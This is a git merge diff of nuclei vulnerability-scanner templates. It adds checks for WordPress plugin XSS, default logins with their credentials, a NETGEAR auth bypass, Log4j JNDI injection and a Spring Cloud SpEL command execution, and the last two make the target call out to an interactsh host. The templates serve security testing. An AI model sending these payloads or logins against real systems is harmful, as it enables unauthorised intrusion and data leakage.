Merge branch 'projectdiscovery:master' into master
commit
06a553e4a4
|
@ -1,21 +1 @@
|
||||||
cnvd/2021/CNVD-2021-01931.yaml
|
vulnerabilities/springboot/springboot-log4j-rce.yaml
|
||||||
cnvd/2021/CNVD-2021-14536.yaml
|
|
||||||
cves/2020/CVE-2020-17456.yaml
|
|
||||||
cves/2020/CVE-2020-27467.yaml
|
|
||||||
cves/2021/CVE-2021-41691.yaml
|
|
||||||
cves/2021/CVE-2021-42063.yaml
|
|
||||||
cves/2022/CVE-2022-0437.yaml
|
|
||||||
exposed-panels/avtech-avn801-camera-panel.yaml
|
|
||||||
exposed-panels/beyondtrust-login-server.yaml
|
|
||||||
exposed-panels/beyondtrust-panel.yaml
|
|
||||||
exposed-panels/directadmin-login-panel.yaml
|
|
||||||
exposed-panels/open-virtualization-manager-panel.yaml
|
|
||||||
misconfiguration/jolokia/jolokia-info-disclosure.yaml
|
|
||||||
misconfiguration/jolokia/jolokia-list.yaml
|
|
||||||
misconfiguration/jolokia/jolokia-mbean-search.yaml
|
|
||||||
technologies/open-virtualization-manager-detect.yaml
|
|
||||||
token-spray/api-cloudflare.yaml
|
|
||||||
vulnerabilities/huawei/huawei-hg255s-lfi.yaml
|
|
||||||
vulnerabilities/other/oracle-fatwire-lfi.yaml
|
|
||||||
vulnerabilities/other/tekon-info-leak.yaml
|
|
||||||
vulnerabilities/wordpress/wordpress-wp-cron.yaml
|
|
||||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 |
|
| cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
|
||||||
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 |
|
| panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
|
||||||
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 |
|
| lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
|
||||||
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 |
|
| xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
|
||||||
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | |
|
| wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
|
||||||
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | |
|
| exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
|
||||||
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | |
|
| rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
|
||||||
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | |
|
| cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
|
||||||
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | |
|
| tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
|
||||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
| wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |
|
||||||
|
|
||||||
**236 directories, 3310 files**.
|
**239 directories, 3325 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
2790
TEMPLATES-STATS.md
2790
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 |
|
| cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
|
||||||
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 |
|
| panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
|
||||||
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 |
|
| lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
|
||||||
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 |
|
| xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
|
||||||
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | |
|
| wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
|
||||||
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | |
|
| exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
|
||||||
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | |
|
| rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
|
||||||
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | |
|
| cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
|
||||||
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | |
|
| tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
|
||||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
| wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |
|
||||||
|
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-25055
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: FeedWordPress < 2022.0123 - Authenticated Reflected XSS
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
|
||||||
|
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-25055
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<img src=1 onerror=alert(document.domain)>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-25112
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
|
||||||
|
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-25112
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<img src onerror=alert(document.domain)>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,14 +1,14 @@
|
||||||
id: CVE-2021-41691
|
id: CVE-2021-41691
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: openSIS Student Information System 8.0 SQl Injection Vulnerability
|
name: OpenSIS Student Information System 8.0 - Authenticated SQL Injection
|
||||||
author: Bartu Utku SARP
|
author: Bartu Utku SARP
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
|
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
|
||||||
- https://www.exploit-db.com/exploits/50637
|
- https://www.exploit-db.com/exploits/50637
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
|
||||||
tags: cve,cve2021,opensis,sqli,auth
|
tags: cve,cve2021,opensis,sqli,authenticated
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -22,7 +22,11 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
|
GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
|
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
|
||||||
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
|
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
|
||||||
|
@ -43,6 +47,7 @@ requests:
|
||||||
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
|
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
|
||||||
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
|
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2022-0148
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
|
||||||
|
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.40
|
||||||
|
cve-id: CVE-2022-0148
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<img src onerror=alert(`document.domain`) x">'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2022-0189
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP RSS Aggregator < 4.20 - Authenticated Reflected XSS
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
|
||||||
|
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2022-0189
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||||
|
|
||||||
|
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<img src onerror=alert(`document.domain`)>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: dolphinscheduler-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache DolphinScheduler Default Login
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/apache/dolphinscheduler
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"DolphinScheduler"
|
||||||
|
tags: apache,dolphinscheduler,default-login,oss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /dolphinscheduler/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
userName={{user}}&userPassword={{pass}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- dolphinscheduler123
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"msg":"login success"'
|
||||||
|
- '"sessionId":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: hue-default-credential
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cloudera Hue Default Admin Login
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: high
|
||||||
|
description: Hue default admin login was discovered.
|
||||||
|
reference: https://github.com/cloudera/hue
|
||||||
|
metadata:
|
||||||
|
shodan-query: title:"Hue - Welcome to Hue"
|
||||||
|
tags: hue,default-login,oss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /hue/accounts/login?next=/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /hue/accounts/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
- hue
|
||||||
|
- hadoop
|
||||||
|
- cloudera
|
||||||
|
|
||||||
|
pass:
|
||||||
|
- admin
|
||||||
|
- hue
|
||||||
|
- hadoop
|
||||||
|
- cloudera
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrfmiddlewaretoken
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- name='csrfmiddlewaretoken' value='(.+?)'
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(tolower(body_1), 'welcome to hue')
|
||||||
|
- contains(tolower(all_headers_2), 'csrftoken=')
|
||||||
|
- contains(tolower(all_headers_2), 'sessionid=')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: emqx-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Emqx Default Login
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.favicon.hash:"-670975485"
|
||||||
|
tags: emqx,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /api/v4/auth HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{"username":"{{user}}","password":"{{pass}}"}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- public
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- body == "{\"code\":0}"
|
||||||
|
- status_code == 200
|
||||||
|
condition: and
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: geoserver-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Geoserver Default Login
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
fofa-query: app="GeoServer"
|
||||||
|
tags: geoserver,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /geoserver/j_spring_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{user}}&password={{pass}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- geoserver
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(tolower(location), '/geoserver/web')"
|
||||||
|
- "!contains(tolower(location), 'error=true')"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -1,7 +1,7 @@
|
||||||
id: open-virtualization-manager-panel
|
id: open-virtualization-manager-panel
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Open Virtualization Manager Userportal and Webadmin panel
|
name: Open Virtualization Userportal & Webadmin Panel
|
||||||
author: idealphase
|
author: idealphase
|
||||||
severity: info
|
severity: info
|
||||||
description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
|
description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
id: jolokia-mbean-search
|
id: jolokia-mbean-search
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Jolokia -Searching MBeans
|
name: Jolokia - Searching MBeans
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: low
|
severity: low
|
||||||
reference:
|
reference:
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: emqx-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Emqx Detection
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: info
|
||||||
|
tags: tech,emqx
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/static/emq.ico"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
name: favicon
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && ('-670975485' == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: netgear-wac124-router-auth-bypass
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NETGEAR WAC124 Router Authentication Bypass
|
||||||
|
author: gy741
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
|
||||||
|
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
|
||||||
|
tags: netgear,auth-bypass,router,iot
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Enable Telnet"
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: springboot-log4j-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Spring Boot Log4j Remote Code Injection
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
|
||||||
|
reference:
|
||||||
|
- https://logging.apache.org/log4j/2.x/security.html
|
||||||
|
- https://www.lunasec.io/docs/blog/log4j-zero-day/
|
||||||
|
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
|
||||||
|
tags: springboot,rce,oast,log4j
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 10.00
|
||||||
|
cve-id: CVE-2021-44228
|
||||||
|
cwe-id: CWE-502
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: springcloud-function-spel-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Spring Cloud Function SPEL RCE
|
||||||
|
author: Mr-xn
|
||||||
|
severity: critical
|
||||||
|
reference:
|
||||||
|
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
|
||||||
|
- https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
|
||||||
|
tags: springcloud,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /{{rand_base(8)}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{{rand_base(8)}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
- "dns"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
Loading…
Reference in New Issue